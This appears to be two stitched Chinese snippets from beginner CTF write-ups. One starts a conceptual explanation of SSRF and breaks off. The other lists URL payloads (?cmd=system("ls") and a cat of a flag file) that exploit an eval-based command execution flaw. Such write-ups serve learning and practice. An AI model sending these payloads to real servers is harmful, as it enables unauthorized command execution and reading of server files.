小白一个，记录解题过程，如有错误请指正！补充知识点：1.什么是SSRFSSRF(Server-Side Request Forgery：服务器跨站请求),是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内网。也就是说可以利用一个网络请求的服务，当作跳板进行攻击）2.SSR

小白一个，如有错误请指正！一、eval执行?cmd=system("ls");?cmd=system("ls%20/");?cmd=system("cat%20/flag_26396");